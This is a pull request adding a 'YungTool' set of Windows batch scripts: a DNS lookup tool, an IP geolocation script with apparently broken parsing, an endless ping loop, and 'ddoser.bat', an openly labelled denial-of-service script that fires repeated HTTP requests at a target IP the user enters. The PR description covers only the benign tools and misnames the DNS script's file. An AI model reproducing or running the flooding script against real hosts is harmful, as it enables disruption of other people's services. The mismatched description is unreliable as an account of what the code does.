### PR TITLE
files 

### DIFF
--- a/Tracedns.bat
+++ b/Tracedns.bat
@@ -1,0 +1,33 @@
+@echo off
+set /p domain="Enter the domain to trace: "
+
+echo Tracing DNS for %domain%...
+echo ---------------------------
+
+nslookup -type=ns %domain% > nslookup.txt
+if %ERRORLEVEL% neq 0 (
+    echo Error: Unable to perform DNS trace.
+    pause
+    exit /b 1
+)
+
+echo Name Servers:
+echo ------------
+type nslookup.txt | findstr /i "nameserver"
+echo.
+
+echo DNS Resolution:
+echo -------------
+nslookup %domain% > dns_resolution.txt
+if %ERRORLEVEL% neq 0 (
+    echo Error: Unable to resolve DNS.
+    pause
+    exit /b 1
+)
+
+type dns_resolution.txt
+echo.
+
+del nslookup.txt
+del dns_resolution.txt
+pause

--- a/ddoser.bat
+++ b/ddoser.bat
@@ -1,0 +1,30 @@
+@echo off
+chcp 65001 >nul
+:banner
+echo.
+echo.
+echo.                                       ██╗   ██╗██╗   ██╗███╗   ██╗ ██████╗ 
+echo.                                       ╚██╗ ██╔╝██║   ██║████╗  ██║██╔════╝ 
+echo.                                        ╚████╔╝ ██║   ██║██╔██╗ ██║██║  ███╗ doser
+echo.                                         ╚██╔╝  ██║   ██║██║╚██╗██║██║   ██║
+echo.                                          ██║   ╚██████╔╝██║ ╚████║╚██████╔╝
+echo.                                          ╚═╝    ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝
+echo.
+
+set /p ip="Enter the IP address to target: "
+set /p num_requests="Enter the number of requests to send: "
+
+set count=0
+:loop
+set /a count+=1
+powershell -Command "Invoke-WebRequest -Uri 'http://%ip%/' -Method Get -OutFile nul -ErrorAction SilentlyContinue"
+if %ERRORLEVEL% neq 0 (
+    echo Error: Unable to connect to the remote server.
+    pause
+    exit /b 1
+)
+echo Request %count% sent.
+timeout /t 1 > nul
+if %count% lss %num_requests% goto loop
+echo Done!
+pause

--- a/ipgeo.bat
+++ b/ipgeo.bat
@@ -1,0 +1,39 @@
+@echo off
+set /p ip="Enter the IP address to geolocate: "
+
+curl -s "https://ipapi.co/%ip%/json/" > ipgeo.json
+
+if %ERRORLEVEL% neq 0 (
+    echo Error: Unable to fetch geolocation data.
+    pause
+    exit /b 1
+)
+
+if not exist ipgeo.json (
+    echo Error: Empty response from API.
+    pause
+    exit /b 1
+)
+
+echo IP Geolocation Data:
+echo --------------------
+
+for /f "tokens=2 delims=:" %%a in ('findstr /i "ip city region country latitude longitude" ipgeo.json') do (
+    set "%%a=%%a"
+)
+
+if not defined ip (
+    echo Error: Unable to extract geolocation data.
+    pause
+    exit /b 1
+)
+
+echo IP: %ip%
+echo City: %city%
+echo Region: %region%
+echo Country: %country%
+echo Latitude: %latitude%
+echo Longitude: %longitude%
+
+del ipgeo.json
+pause

--- a/pinger.bat
+++ b/pinger.bat
@@ -1,0 +1,17 @@
+@echo off
+chcp 65001 >nul
+:banner
+echo.
+echo.
+echo.                                       ██╗   ██╗██╗   ██╗███╗   ██╗ ██████╗ 
+echo.                                       ╚██╗ ██╔╝██║   ██║████╗  ██║██╔════╝ 
+echo.                                        ╚████╔╝ ██║   ██║██╔██╗ ██║██║  ███╗ PINGER
+echo.                                         ╚██╔╝  ██║   ██║██║╚██╗██║██║   ██║
+echo.                                          ██║   ╚██████╔╝██║ ╚████║╚██████╔╝
+echo.                                          ╚═╝    ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝
+echo.
+set /p target="Enter the IP address or hostname to ping: "
+:loop
+ping -n 1 %target%
+timeout /t 1 > nul
+goto loop


### PR DESCRIPTION
YungTool

A collection of command-line tools for geolocating IP addresses and tracing DNS records.
Tools
1. IP Geolocation

    ipgeo.bat: A Batch script that uses the ipapi.co API to geolocate an IP address and extract city, region, country, latitude, and longitude information.

2. DNS Trace

    dns_trace.bat: A Batch script that performs a DNS trace using the nslookup command and extracts name servers and DNS resolution information.

Usage
IP Geolocation

    Save ipgeo.bat to a directory on your system.
    Run ipgeo.bat in a Command Prompt window.
    Enter the IP address to geolocate when prompted.

DNS Trace

    Save dns_trace.bat to a directory on your system.
    Run dns_trace.bat in a Command Prompt window.
    Enter the domain to trace when prompted.

Requirements

    curl command-line tool (for IP geolocation)
    nslookup command-line tool (for DNS trace)

Note

    Be aware of the API usage limits and terms of service for ipapi.co.
    Be aware of the DNS resolution limits and terms of service for your DNS provider.

Contributions are welcome! If you'd like to add new features or improve existing ones, please submit a pull request.
Issues

If you encounter any issues or have questions, please open an issue on this repository.